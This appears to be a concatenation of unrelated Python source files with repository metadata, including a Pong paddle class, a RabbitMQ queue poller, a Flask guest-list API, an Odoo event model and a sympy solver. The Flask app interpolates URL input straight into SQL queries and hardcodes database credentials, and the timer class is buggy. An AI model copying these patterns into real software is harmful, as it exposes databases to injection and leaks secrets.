title_str = value[0][0].strip().replace(' ', '_')
else:
if i != 0 and isinstance(table_res[i -1], str):
title_str = get_title_list(table_res[i - 1])
else:
title_str = '未找到标题'
if len(value) > 2 and len(value[0]) > 0:
value_list = [[title_str, ''*(len(value[0])-1)]] + value[2:]
df = pd.DataFrame(value_list)
filePath = r'./data/table.xlsx'
df.to_excel(filePath, header=None, index=None)
with open(filePath, 'rb') as f:
table_str = f.read()
encodestr = base64.b64encode(table_str)
table_br = encodestr.decode()
if os.path.exists(filePath):
os.remove(filePath)
table_list.append({"title": title_str, "content": table_br})
elif isinstance(value, str):
value = value.replace(' ', '').replace('。\n', '\n').replace('\n', '。\n')
txt_list.append(value)
txt_str = '\n'.join(txt_list).replace('\n。', '')
return txt_str, table_list
| [
"18236578618@163.com"
] | 18236578618@163.com |
82f3e426ff64ad3759aa251a48b9dbf3f4b6602d | e8b379292c137fe2ef783f1e339f06973ab58925 | /padddle.py | c26f469b577cefae89469331962659a1281365c8 | [] | no_license | ayushi25jaiswal/pong_game | 7a004e7daf3a30d84b440759457336e1a0f33ec1 | c186c339348567a12b9eca3c474f3d179be02f90 | refs/heads/master | 2023-07-15T15:16:26.678682 | 2021-09-07T06:21:27 | 2021-09-07T06:21:27 | 403,864,822 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 491 | py | from turtle import Turtle
class Paddle(Turtle):
    """A white rectangular pong paddle that moves vertically in 40-pixel steps."""

    def __init__(self, x_cor, y_cor):
        """Create the paddle and place it at (x_cor, y_cor)."""
        super().__init__()
        self.shape("square")
        self.color("white")
        # A 20x20 square stretched to 60px tall by 10px wide.
        self.shapesize(stretch_wid=3, stretch_len=0.5)
        self.penup()
        self.goto(x_cor, y_cor)
        self.speed("fastest")

    def up(self):
        """Move the paddle 40 pixels upward."""
        self.goto(self.xcor(), self.ycor() + 40)

    def down(self):
        """Move the paddle 40 pixels downward."""
        self.goto(self.xcor(), self.ycor() - 40)
"ayushijaiswal2507@gmail.com"
] | ayushijaiswal2507@gmail.com |
659e4d298c6b0016bd4b3417190d4ad431ea381a | d78a93aee67511c7f8b2b555aa02b3935a6b531e | /student/migrations/0003_auto_20180629_1109.py | b2f5e44e36b81dd36f586d411e1f1ad069efa03e | [] | no_license | bigbizzy001/student_portal | d7780ea6d78d8ac4ceae70b8d6022cbc085af688 | 303ed233f362035b0b3a6a089e29ff64b6cb113b | refs/heads/master | 2020-03-26T17:44:52.233874 | 2018-08-18T00:44:29 | 2018-08-18T00:44:29 | 145,177,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 851 | py | # Generated by Django 2.0.4 on 2018-06-29 10:09
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('student', '0002_auto_20180627_1400'),
]
operations = [
migrations.DeleteModel(
name='HallVenueArrangement',
),
migrations.AlterField(
model_name='timetableone',
name='day',
field=models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, related_name='day_first', to='student.LectureDay'),
),
migrations.AlterField(
model_name='timetabletwo',
name='day',
field=models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, related_name='day_second', to='student.LectureDay'),
),
]
| [
"marcusbourdelon@gmail.com"
] | marcusbourdelon@gmail.com |
bee7f7fa94cd9ef606a12c92afa48b6f4531a465 | 41d032c8a80e1fc124f2aba88c409051d3455ee0 | /simple_queue_waiter.py | ce76c9b46d6a25239b3d3eba3fb94033a0ff78ca | [
"Apache-2.0"
] | permissive | KernelPryanic/simple-queue-waiter | 9c33f9dd203f40925232adf0d451fdf77d0b9e81 | bc831756b4e62cde19f53788b18f38c609160eda | refs/heads/master | 2021-09-08T21:21:02.372814 | 2018-03-12T08:29:30 | 2018-03-12T08:29:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,987 | py | from collections import MutableSequence
from multiprocessing.pool import ThreadPool
import sys
import time
import yaml
import pika
class SimpleChecker(object):
    """Connection settings for one RabbitMQ queue to watch.

    Plain attribute storage; Checker.check() reads these fields directly
    when opening the pika connection.
    """

    def __init__(self, host, port, virtual_host, queue, user, password):
        self.host, self.port = host, port
        self.virtual_host = virtual_host
        self.queue = queue
        self.user, self.password = user, password
class Checker(MutableSequence, object):
    """Polls a set of RabbitMQ queues until every one of them is empty.

    Behaves as a mutable sequence of SimpleChecker targets; run() blocks,
    re-checking all queues every ``period`` minutes with ``threads``
    workers per round.

    NOTE(review): the file imports MutableSequence from ``collections``,
    which was removed in Python 3.10 -- it should come from
    ``collections.abc``; confirm the target interpreter version.
    """

    def __init__(self, period=10, threads=2):
        self.period = period      # minutes between polling rounds
        self.threads = threads    # worker threads per polling round
        self.simples = []         # the SimpleChecker targets

    # Collection protocol: delegate straight to the underlying list.
    def __getitem__(self, index):
        return self.simples[index]

    def __setitem__(self, index, value):
        self.simples[index] = value

    def __delitem__(self, index):
        del self.simples[index]

    def __iter__(self):
        return iter(self.simples)

    def __len__(self):
        return len(self.simples)

    def add(self, sc):
        """Append *sc* if it is a SimpleChecker; silently ignore anything else."""
        if isinstance(sc, SimpleChecker):
            self.simples.append(sc)

    def insert(self, index, sc):
        if isinstance(sc, SimpleChecker):
            self.simples.insert(index, sc)

    def index(self, sc):
        # BUG FIX: the original dropped the result of list.index (always
        # returning None, shadowing the MutableSequence mixin); return it.
        if isinstance(sc, SimpleChecker):
            return self.simples.index(sc)

    def remove(self, sc):
        if isinstance(sc, SimpleChecker):
            self.simples.remove(sc)

    def check(self, simple):
        """Return the message count of *simple*'s queue, or [] when the
        queue cannot be declared (kept as-is: run() treats a non-zero,
        non-int result as 'not yet empty')."""
        connection = pika.BlockingConnection(
            pika.ConnectionParameters(
                host=simple.host,
                port=simple.port,
                virtual_host=simple.virtual_host,
                credentials=pika.PlainCredentials(simple.user, simple.password)
            )
        )
        channel = connection.channel()
        try:
            # passive=True: only verify the queue exists, never create it.
            res = channel.queue_declare(queue=simple.queue, passive=True)
        except Exception:  # was a bare except; keep best-effort semantics
            print("Can't connect to queue")
            connection.close()
            return []
        connection.close()
        return res.method.message_count

    def run(self):
        """Block until every watched queue reports zero messages."""
        while True:
            pool = ThreadPool(self.threads)
            results = pool.map(self.check, self.simples)
            pool.close()
            pool.join()
            print(results)
            if all(el == 0 for el in results):
                break
            time.sleep(self.period * 60)
def main():
    """Load the YAML config named on the command line and poll the queues
    it lists until all of them are empty."""
    try:
        with open(sys.argv[1], "r") as config:
            # NOTE(review): yaml.load without an explicit Loader is unsafe
            # on untrusted files and deprecated since PyYAML 5.1 --
            # consider yaml.safe_load(config).
            conf = yaml.load(config)
        # One watcher per configured queue target.
        ch = Checker(conf["period"], conf["threads"])
        for el in conf["targets"]:
            ch.add(SimpleChecker(el["host"], el["port"], el["virtual_host"],
                                 el["queue"], el["user"], el["password"]))
        ch.run()  # blocks until every queue reports zero messages
    except KeyboardInterrupt:
        print('\nThe process was interrupted by the user')
        raise SystemExit
if __name__ == "__main__":
main()
| [
"dtrishkin@datanyze.com"
] | dtrishkin@datanyze.com |
c4f68caa06be6ae613dfb9c9850f0f5a092867aa | dc893a23ea659a9aff10c972202abae113a31f8d | /causal_inference/code/CVPR2012_slidingwindow_action_detection/waterstream_11_9404.py | 58c73a6e5a77a341aea618db12ff70b2b785c21c | [] | no_license | scotfang/research | f28ff4cdcdb579839fddabc7d77a31b324f45a78 | 424e0dce9e5083e75ac49a33765d1a9d7c2878e9 | refs/heads/master | 2021-01-01T17:17:15.633209 | 2014-05-12T18:20:43 | 2014-05-12T18:20:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | temporal_parses = {
2327: { "benddown_START": {"energy": -0.000000, "agent": "uuid1"} },
2468: { "benddown_END": {"energy": -0.000000, "agent": "uuid1"} },
2469: { "benddown_START": {"energy": 0.000000, "agent": "uuid1"} },
2613: { "benddown_END": {"energy": 0.000000, "agent": "uuid1"} },
},
| [
"scotfang@gmail.com"
] | scotfang@gmail.com |
e726941169e7ccc91c362ce921522b6ae2e4cbe5 | 93234feb385b43fc16102bbf69f8588705b21561 | /time.py | 238316ff395e2e934733526f93654b85c23f9182 | [] | no_license | horcham/python | 012046906e3cd35b6bf2286ffcbad60644366adb | c26388312f8fad2d0a88d78761a786761d325b75 | refs/heads/master | 2021-01-12T15:52:56.091319 | 2016-10-04T12:10:26 | 2016-10-04T12:10:26 | 69,321,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,208 | py | #-*- coding:utf-8-*-
#时间元组
#gmtime(),localtime()和strptime()都以时间元组返回
import time
a = time.gmtime()
print(a)
b = time.mktime(a)
print(b)
#分别代表:年、月、日、时、分、秒、星期、一年中第几天、夏令时
c = time.perf_counter()
print(c)
'''
time.altzone
#返回格林威治西部夏令时地区的偏移秒数
time.asctime([t])
#接受时间元组并返回一个可读取的形式为"Tue Dec 11 18:07:14 2015"
time.clock()
#用以浮点数计算的秒数返回当前的CPU时间
time.gmtime([secs])
#接受时间戳(1970后经过的浮点秒数)并返回格林威治时间下的时间元组t
time.localtime([secs])
#接受时间戳(1970后经过的浮点秒数)并返回当地时间下的时间元组t
time.mktime(t)
#接受时间元组并返回时间戳
time.perf_counter()
返回系统运行时间,包括系统睡眠时间
time.process_time()
返回当前进程执行CPU的时间总和,不包括睡眠时间
time.sleep(secs)
推迟条用线程的运行
'''
#定时器
import time as t
class Timer():
def __init__(self):
self.unit = ['年','月','天','小时','分钟','秒']
self.prompt = '未开始计时'
self.lasted = []
self.begin = 0
self.end = 0
#是结果可以直接由对象直接调出来
def __str__(self):
return self.prompt
__repr__ = __str__
#开始计时
def start(self):
self.start = t.localtime()
self.prompt = '提示:先调用 stop()停止计时'
print('计时开始..')
#停止计时
def stop(self):
if not self.begin: #self.begin为0,不为真
print('提示:先调用start()进行计时')
else:
self.stop = t.localtime()
self._calc()
print('计时结束..')
#计算运行时间
def _calc(self):
self.lasted = []
self.prompt = '总共运行了'
for index in range(6):
self.lasted.append(self.stop[index] - self.start[index])
if self.lasted[index]:
self.prompt += (str(self.lasted[index]) + self.unit[index])
#为下一轮计时初始化变量
self.begin = 0
self.end = 0 | [
"690936541@qq.com"
] | 690936541@qq.com |
ff7cecce2015e765e1c37e3bbc6661a5ff53c64c | 29d8603e20c820fa2e7141a136ada3c5853a4974 | /raachem/__init__.py | 79021dbcba2e186f6f4b712e41dcad4f4c8434a7 | [
"MIT"
] | permissive | ricalmang/raachem | 3e76599fd880bce7e11746c5d674125dfb72bba2 | d00d634957a27e43e706c7faa565fb15b3cf154c | refs/heads/master | 2022-12-31T20:00:57.284852 | 2020-10-19T05:54:12 | 2020-10-19T05:54:12 | 236,590,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py | from raachem.file_class.gjf import *
from raachem.file_class.inp import *
from raachem.file_class.xyz import *
from raachem.file_class.log import *
from raachem.file_creator.e_analysis import *
from raachem.file_creator.input import *
from raachem.file_creator.xyz import *
from raachem.file_creator.deploy_scripts import *
from raachem.util.gen_purp import *
| [
"ricardo_almir@hotmail.com"
] | ricardo_almir@hotmail.com |
22ab383b407c99415b5f7885c0d8c8c564ec0d3c | c4b94158b0ac8f1c4f3d535b6cdee5d1639743ce | /Python/191__Number_of_1_Bits.py | b64ace4b9dd4bc9b74e3c645eb8855f0bfc393c4 | [] | no_license | FIRESTROM/Leetcode | fc61ae5f11f9cb7a118ae7eac292e8b3e5d10e41 | 801beb43235872b2419a92b11c4eb05f7ea2adab | refs/heads/master | 2020-04-04T17:40:59.782318 | 2019-08-26T18:58:21 | 2019-08-26T18:58:21 | 156,130,665 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 558 | py | class Solution(object):
def hammingWeight(self, n):
"""
:type n: int
:rtype: int
"""
result = 0
while n:
if n & 1 == 1:
result += 1
n = n >> 1
return result
# Another solution using a trick of bit
class Solution(object):
def hammingWeight(self, n):
"""
:type n: int
:rtype: int
"""
result = 0
while n:
result += 1
n = n & (n - 1) # Flip the least significant 1
return result
| [
"junou_cui@berkeley.edu"
] | junou_cui@berkeley.edu |
e6abef9bf3bf91103e722ef652077ea427964e52 | bc599c9a404940fae21ed6b57edb7bb9dc04e71c | /app/graphics/baseGraphic.py | 9402148fb19d3b5ea25e3d5b2212cb4925d18707 | [] | no_license | jcarlosglx/SparkReport | c9b37a1419f113ea13341e6641ceb17056aeb7d0 | 9d6b044f037e8dfe583bcf76c51dd792ac1cc34a | refs/heads/master | 2023-08-11T16:04:28.393856 | 2021-09-21T23:06:08 | 2021-09-21T23:06:08 | 409,001,831 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,027 | py | from typing import NoReturn
import matplotlib.pyplot as plt
from pandas import DataFrame
class NonGraphicsBase:
FIRST = 0
class GraphicBase:
def __init__(self, x_figure: int = 10, y_figure: int = 10):
self.x_figure = x_figure
self.y_figure = y_figure
self.FIRST = 0
def _single_template(
self, tittle: str, x_df: DataFrame, y_df: DataFrame
) -> NoReturn:
x_name = x_df.columns[self.FIRST]
y_name = y_df.columns[self.FIRST]
plt.figure(figsize=(self.x_figure, self.y_figure))
plt.grid()
plt.title(f"{tittle}")
plt.ylabel(y_name)
plt.xlabel(x_name)
def _multi_template(
self, tittle: str, x_df: DataFrame, y_df: DataFrame
) -> NoReturn:
x_name = x_df.columns[self.FIRST]
y_name = str([f"{name} " for name in y_df.columns])
plt.figure(figsize=(self.x_figure, self.y_figure))
plt.grid()
plt.title(f"{tittle}")
plt.ylabel(y_name)
plt.xlabel(x_name)
| [
"j.carlosglxg@gmail.com"
] | j.carlosglxg@gmail.com |
6e2e905228e45ea04bc9ad7f82fabc026d4ddd3a | 9c5b08d26c142df75514530166095f52026b6e2f | /app.py | 982fd4a81aa567e0b807761fd2d9370b72ae0409 | [] | no_license | safern/santiagoyregina | 66bb061e5a07b1eba937a3f8bc102d22306b679a | 2aaf475d202bf96efa74c52e653987ce63f5a170 | refs/heads/main | 2023-06-15T11:05:38.964291 | 2021-06-22T20:05:10 | 2021-06-22T20:05:10 | 380,136,631 | 0 | 0 | null | 2021-06-25T05:45:16 | 2021-06-25T05:45:15 | null | UTF-8 | Python | false | false | 3,053 | py | from flask import Flask, jsonify, request
from flaskext.mysql import MySQL
from flask_cors import CORS, cross_origin
from flask_restful import reqparse
app = Flask(__name__)
cors = CORS(app)
app.config['CORS_HEADERS']= 'Content-Type'
app.config['MYSQL_DATABASE_USER'] = 'hae1w0act11g94ma'
app.config['MYSQL_DATABASE_PASSWORD']= 'ubur0jp9tb3e10df'
app.config['MYSQL_DATABASE_DB'] = 'cg0sr7xch3djtgo8'
app.config['MYSQL_DATABASE_HOST'] = 'lyn7gfxo996yjjco.cbetxkdyhwsb.us-east-1.rds.amazonaws.com'
class Database:
def __init__(self):
mysql = MySQL()
mysql.init_app(app)
conn = mysql.connect()
self.cursor = conn.cursor()
parser = reqparse.RequestParser()
#parser.add_argument('invitados', required=True, location='headers')
#self.env = request.headers.get('invitados')
@app.route('/<string:codigo_invitado>', methods=['GET'])
@cross_origin()
def get(codigo_invitado):
if codigo_invitado == 'favicon.ico':
return ''
db = Database()
db.cursor.execute(f'SELECT * FROM info WHERE codigoInvitado = \'{codigo_invitado}\'')
info = db.cursor.fetchall()
print(info)
tickets_recepcion_info = []
tickets_after_info = []
for ticket in info:
if ticket[3] == '':
tickets_after_info.append({
"id": ticket[2],
"nombre": ticket[4]
})
else:
tickets_recepcion_info.append({
"id": ticket[2],
"nombre": ticket[3]
})
return {
"codigo_invitado": codigo_invitado,
"rotulo": info[0][1],
"boletos_recepcion": {
"total": len(tickets_recepcion_info),
"info_boletos": tickets_recepcion_info
},
"boletos_after": {
"total": len(tickets_after_info),
"info_boletos": tickets_after_info
}
}
@app.route('/', methods=['POST'])
@cross_origin()
def post():
db = Database()
data = request.get_json()
codigo_invitado = data.get('codigo_invitado')
db.cursor.execute(f'SELECT * FROM info WHERE codigoInvitado = \'{codigo_invitado}\'')
info = db.cursor.fetchall()
print(info)
if info:
tickets_recepcion_info = []
tickets_after_info = []
for ticket in info:
if ticket[3] == '':
tickets_after_info.append({
"id": ticket[2],
"nombre": ticket[4]
})
else:
tickets_recepcion_info.append({
"id": ticket[2],
"nombre": ticket[3]
})
return {
"codigo_invitado": codigo_invitado,
"rotulo": info[0][1],
"boletos_recepcion": {
"total": 2,
"info_boletos": tickets_recepcion_info
},
"boletos_after": {
"total": 3,
"info_boletos": tickets_after_info
}
}
return 'false'
# PATCH
@app.route('/', methods=['PATCH'])
@cross_origin()
def updateDB():
data = request.get_json()
db = Database()
print(data.get('codigo_invitado'))
# debe recibir arreglo de ids
#tickets = data.get('tickets_array')
#for ticket in tickets:
# db.cursor.execute(f'UPDATE guest SET asiste = 1 WHERE id = \'{ticket}\'')
# db.cursor.connection.commit()
return 'true'
| [
"regina.madero.torres@gmail.com"
] | regina.madero.torres@gmail.com |
75e6a03d5a69e5540503ea26fcf6149bca408aae | 045cb1a5638c3575296f83471758dc09a8065725 | /addons/website_event/models/event.py | da47fe454cee4a971191fe60794ffc5ff9e718f8 | [] | no_license | marionumza/saas | 7236842b0db98d1a0d0c3c88df32d268509629cb | 148dd95d991a348ebbaff9396759a7dd1fe6e101 | refs/heads/main | 2023-03-27T14:08:57.121601 | 2021-03-20T07:59:08 | 2021-03-20T07:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,069 | py | # -*- coding: utf-8 -*-
import pytz
import werkzeug
import json
from harpiya import api, fields, models, _
from harpiya.addons.http_routing.models.ir_http import slug
from harpiya.exceptions import UserError
GOOGLE_CALENDAR_URL = 'https://www.google.com/calendar/render?'
class EventType(models.Model):
_name = 'event.type'
_inherit = ['event.type']
website_menu = fields.Boolean(
'Display a dedicated menu on Website')
class Event(models.Model):
_name = 'event.event'
_inherit = ['event.event', 'website.seo.metadata', 'website.published.multi.mixin']
website_published = fields.Boolean(tracking=True)
subtitle = fields.Char('Event Subtitle', translate=True)
is_participating = fields.Boolean("Is Participating", compute="_compute_is_participating")
cover_properties = fields.Text(
'Cover Properties',
default='{"background-image": "none", "background-color": "oe_blue", "opacity": "0.4", "resize_class": "cover_mid"}')
website_menu = fields.Boolean('Dedicated Menu',
help="Creates menus Introduction, Location and Register on the page "
" of the event on the website.", copy=False)
menu_id = fields.Many2one('website.menu', 'Event Menu', copy=False)
def _compute_is_participating(self):
# we don't allow public user to see participating label
if self.env.user != self.env['website'].get_current_website().user_id:
email = self.env.user.partner_id.email
for event in self:
domain = ['&', '|', ('email', '=', email), ('partner_id', '=', self.env.user.partner_id.id), ('event_id', '=', event.id)]
event.is_participating = self.env['event.registration'].search_count(domain)
else:
self.is_participating = False
@api.depends('name')
def _compute_website_url(self):
super(Event, self)._compute_website_url()
for event in self:
if event.id: # avoid to perform a slug on a not yet saved record in case of an onchange.
event.website_url = '/event/%s' % slug(event)
@api.onchange('event_type_id')
def _onchange_type(self):
super(Event, self)._onchange_type()
if self.event_type_id:
self.website_menu = self.event_type_id.website_menu
def _get_menu_entries(self):
""" Method returning menu entries to display on the website view of the
event, possibly depending on some options in inheriting modules. """
self.ensure_one()
return [
(_('Introduction'), False, 'website_event.template_intro'),
(_('Location'), False, 'website_event.template_location'),
(_('Register'), '/event/%s/register' % slug(self), False),
]
def _toggle_create_website_menus(self, vals):
for event in self:
if 'website_menu' in vals:
if event.menu_id and not event.website_menu:
event.menu_id.unlink()
elif event.website_menu:
if not event.menu_id:
root_menu = self.env['website.menu'].create({'name': event.name, 'website_id': event.website_id.id})
event.menu_id = root_menu
for sequence, (name, url, xml_id) in enumerate(event._get_menu_entries()):
event._create_menu(sequence, name, url, xml_id)
@api.model
def create(self, vals):
res = super(Event, self).create(vals)
res._toggle_create_website_menus(vals)
return res
def write(self, vals):
res = super(Event, self).write(vals)
self._toggle_create_website_menus(vals)
return res
def _create_menu(self, sequence, name, url, xml_id):
if not url:
self.env['ir.ui.view'].search([('name', '=', name + ' ' + self.name)]).unlink()
newpath = self.env['website'].new_page(name + ' ' + self.name, template=xml_id, ispage=False)['url']
url = "/event/" + slug(self) + "/page/" + newpath[1:]
menu = self.env['website.menu'].create({
'name': name,
'url': url,
'parent_id': self.menu_id.id,
'sequence': sequence,
'website_id': self.website_id.id,
})
return menu
def google_map_img(self, zoom=8, width=298, height=298):
self.ensure_one()
if self.address_id:
return self.sudo().address_id.google_map_img(zoom=zoom, width=width, height=height)
return None
def google_map_link(self, zoom=8):
self.ensure_one()
if self.address_id:
return self.sudo().address_id.google_map_link(zoom=zoom)
return None
def _track_subtype(self, init_values):
self.ensure_one()
if 'is_published' in init_values and self.is_published:
return self.env.ref('website_event.mt_event_published')
elif 'is_published' in init_values and not self.is_published:
return self.env.ref('website_event.mt_event_unpublished')
return super(Event, self)._track_subtype(init_values)
def action_open_badge_editor(self):
""" open the event badge editor : redirect to the report page of event badge report """
self.ensure_one()
return {
'type': 'ir.actions.act_url',
'target': 'new',
'url': '/report/html/%s/%s?enable_editor' % ('event.event_event_report_template_badge', self.id),
}
def _get_event_resource_urls(self):
url_date_start = self.date_begin.strftime('%Y%m%dT%H%M%SZ')
url_date_stop = self.date_end.strftime('%Y%m%dT%H%M%SZ')
params = {
'action': 'TEMPLATE',
'text': self.name,
'dates': url_date_start + '/' + url_date_stop,
'details': self.name,
}
if self.address_id:
params.update(location=self.sudo().address_id.contact_address.replace('\n', ' '))
encoded_params = werkzeug.url_encode(params)
google_url = GOOGLE_CALENDAR_URL + encoded_params
iCal_url = '/event/%d/ics?%s' % (self.id, encoded_params)
return {'google_url': google_url, 'iCal_url': iCal_url}
def _default_website_meta(self):
res = super(Event, self)._default_website_meta()
event_cover_properties = json.loads(self.cover_properties)
# background-image might contain single quotes eg `url('/my/url')`
res['default_opengraph']['og:image'] = res['default_twitter']['twitter:image'] = event_cover_properties.get('background-image', 'none')[4:-1].strip("'")
res['default_opengraph']['og:title'] = res['default_twitter']['twitter:title'] = self.name
res['default_opengraph']['og:description'] = res['default_twitter']['twitter:description'] = self.subtitle
res['default_twitter']['twitter:card'] = 'summary'
res['default_meta_description'] = self.subtitle
return res
def get_backend_menu_id(self):
return self.env.ref('event.event_main_menu').id
| [
"yasir@harpiya.com"
] | yasir@harpiya.com |
0a329acc24c038ab643e23fad78081243efc3c1a | 37a331ad48e0a2855921b387dde09eb363096a57 | /Connections/FileConnection.py | b6eceef81ce6f12d0e80b4ee00ce889809a64c83 | [] | no_license | markbdsouza/db-data-comparison | 3fbcff3290938d0d2419216fc30cd80481f38d8a | 28fbbce92665798195762109e3c118def4a082ee | refs/heads/master | 2023-01-08T20:11:41.089934 | 2020-11-17T14:17:52 | 2020-11-17T14:17:52 | 312,645,765 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 750 | py | from Config.CONSTANTS import INPUT_FILE_PATH_STRING
from Config.ReadConfig import read_csv_connection_variables, read_txt_connection_variables
from DataframeLogic.GenericDFActivities import create_data_frame_from_csv, create_data_frame_from_txt
def fetch_csv_data_frame():
"""Create and return the CSV data frame"""
file_name = read_csv_connection_variables()
file_path = INPUT_FILE_PATH_STRING.format(file_name)
return create_data_frame_from_csv(file_path)
def fetch_txt_data_frame():
"""Create and return the TXT data frame given the delimiter"""
file_name, delimiter = read_txt_connection_variables()
file_path = INPUT_FILE_PATH_STRING.format(file_name)
return create_data_frame_from_txt(file_path, delimiter)
| [
"mark.benjamin.dsouza@gmail.com"
] | mark.benjamin.dsouza@gmail.com |
2d1dbde168c0b5be9449c6a08430280a959a5fbb | e1b5e4862052f46bcf8462ffea293bcdb470bc61 | /LISTTEST/tex.py | e0f1b1ea5e70cbbca11dd78b3e8cc85ab7ea4119 | [] | no_license | AODQ/python-crap | 518066228c76ebdfd64ae475e7b4f8d5ddc191f4 | b63b3961bf920da476b1066e35c16ec5b46e885f | refs/heads/master | 2021-08-23T00:05:50.393675 | 2017-12-01T20:40:00 | 2017-12-01T20:40:00 | 103,435,110 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 189 | py | import os
print('Lₒ(P, ωₒ) = Lₑ(P, ωₒ) + ∫Ω F(P, ωᵢ, ωₒ) Lᵢ(P, ωᵢ) cosθᵢ dωᵢ')
Lₒ = 0.0
for i in range(0, 10):
ωₒ = i*0.2
Lₒ += ωₒ
print(Lₒ)
| [
"aodq@gmail.com"
] | aodq@gmail.com |
4212291d22bbe503767aaaab0223898ec6224d74 | 89eaed21673a816679d3c2feeb3300aede574bb2 | /fei/app_models/migrations/0008_auto_20200422_1048.py | eb0787efe1f5d39c833ed606991134d9f945f7f6 | [] | no_license | colingong/fei | bd0c8530025963a7d4c3abe9399fc5c25d2f301b | 2f25ac79813508401f1481034dcbf9ce3585bf1e | refs/heads/master | 2022-12-09T03:27:10.469450 | 2020-06-24T06:28:51 | 2020-06-24T06:28:51 | 249,641,609 | 11 | 1 | null | 2022-12-08T03:53:06 | 2020-03-24T07:33:51 | Python | UTF-8 | Python | false | false | 390 | py | # Generated by Django 2.2.11 on 2020-04-22 02:48
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('app_models', '0007_delete_proxytoken'),
]
operations = [
migrations.RenameField(
model_name='warehouse',
old_name='warehouse_type_name',
new_name='warehouse_name',
),
]
| [
"colingong@hotmail.com"
] | colingong@hotmail.com |
f9b74976cf3a863630b6f91560e2d0fadb3eb995 | c421dd51e0e6a4ce84e75724989ac52efcecf15b | /tool/migrations/0050_alter_shoppinglist_name.py | cc524029bb2e3b1f534678ffd8ae0eb664e77065 | [
"MIT"
] | permissive | mikekeda/tools | 3bdbfcbc495bd9b53e2849431c8d8f098149925d | 51a2ae2b29ae5c91a3cf7171f89edf225cc8a6f0 | refs/heads/master | 2023-06-09T09:13:35.142701 | 2023-06-06T17:27:18 | 2023-06-06T17:27:18 | 120,110,752 | 0 | 1 | MIT | 2023-05-23T14:15:43 | 2018-02-03T16:56:57 | Python | UTF-8 | Python | false | false | 434 | py | # Generated by Django 3.2.3 on 2021-05-30 09:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tool', '0049_auto_20210308_0847'),
]
operations = [
migrations.AlterField(
model_name='shoppinglist',
name='name',
field=models.CharField(default='Groceries', max_length=32, verbose_name='list name'),
),
]
| [
"mriynuk@gmail.com"
] | mriynuk@gmail.com |
7314dd1ce978a7d2053f03d14e1596873e990784 | 90c4d97afceb51c9827e0c29cfa5703873644898 | /android_autotools/__main__.py | 816120d4abe7edbd6f2cda8892c7f8c9f6e0013f | [
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | fred104/android-autotools | e6e7de6385b6532afac4248bf5bf1addaeaf19eb | 8566524f11d9551a42451178eb8c119e57e9441b | refs/heads/master | 2021-01-23T03:12:43.472904 | 2017-02-04T06:19:33 | 2017-02-04T06:19:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,219 | py | #!/usr/bin/env python3
import argparse
import os
import sys
import json
import os.path
import subprocess
import android_autotools
def main():
a = argparse.ArgumentParser(prog='abuild',
description='A wrapper around autotools for Android.',
epilog='NDK_HOME must be defined to use this tool.')
a.add_argument('--version', action='version',
version="%(prog)s (android_autotools) {}".format(
android_autotools.__version__))
a.add_argument('-v', dest='verbose', action='store_true',
help="verbose output")
g = a.add_argument_group('build options')
g.add_argument('-a', dest='arch', metavar='arch', action='append',
help="override architectures in provided build file")
g.add_argument('-o', metavar='dir', dest='output_dir',
default='.', help="output directory for build (default: cwd)")
g.add_argument('-R', dest='release', action='store_true',
help="build release (default: debug)")
a.add_argument('-f', dest='config', default='abuild.json',
type=argparse.FileType('r'),
help='build from supplied JSON build file')
args = a.parse_args()
conf = json.load(args.config)
args.config.close()
if 'NDK_HOME' not in os.environ:
print("ERROR: NDK_HOME must be defined.")
return 1
output_dir = os.path.abspath(args.output_dir)
conf_dir = os.path.dirname(args.config.name)
build = android_autotools.BuildSet(
os.environ['NDK_HOME'],
output_dir,
release=args.release,
archs=args.arch or conf.get('archs', android_autotools.ARCHS),
verbose=args.verbose)
for t in conf['targets']:
build.add(os.path.join(conf_dir, t['path']),
t['output'],
*t['configure'],
inject=t.get('inject', None),
cpp=t.get('c++', False))
try:
res = build.run()
return 0 if res is not False else 1
except Exception as e:
if args.verbose:
raise e
print(e)
if __name__ == "__main__":
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| [
"brendan@bbqsrc.net"
] | brendan@bbqsrc.net |
c9df6ac92ac8959e2f091582fbbc2c9b4c356a4b | 34de2b3ef4a2478fc6a03ea3b5990dd267d20d2d | /Python/science/sympy/solve_system_of_lin_eqns_using_sympy.py | b4d8f00eeca664484914e2ac4c57a7927627fd97 | [
"MIT"
] | permissive | bhishanpdl/Programming | d4310f86e1d9ac35483191526710caa25b5f138e | 9654c253c598405a22cc96dfa1497406c0bd0990 | refs/heads/master | 2020-03-26T06:19:01.588451 | 2019-08-21T18:09:59 | 2019-08-21T18:09:59 | 69,140,073 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 709 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Author : Bhishan Poudel; Physics PhD Student, Ohio University
# Date : Oct 04, 2016
# Last update :
#
#
# Imports
from __future__ import division, unicode_literals, print_function
import numpy
import scipy.linalg
from sympy import symbols,solve
w,x,y,z = symbols('w, x, y, z')
eq1 = 3*w + x -1
eq2 = 4*w + x + z -2
eq3 = x -y + 19.9*z + 1
eq4 = 4*w - y + 4*z - 1
ans = solve([eq1, eq2,eq3,eq4], (w,x, y,z))
# answer
# {x: -1.47598253275109, w: 0.825327510917031, z: 0.174672489082969, y: 3.00000000000000}
# w = 0.8253275109170306
# x = -1.4759825327510923
# y = 3.000000000000001
# z = 0.17467248908296953
| [
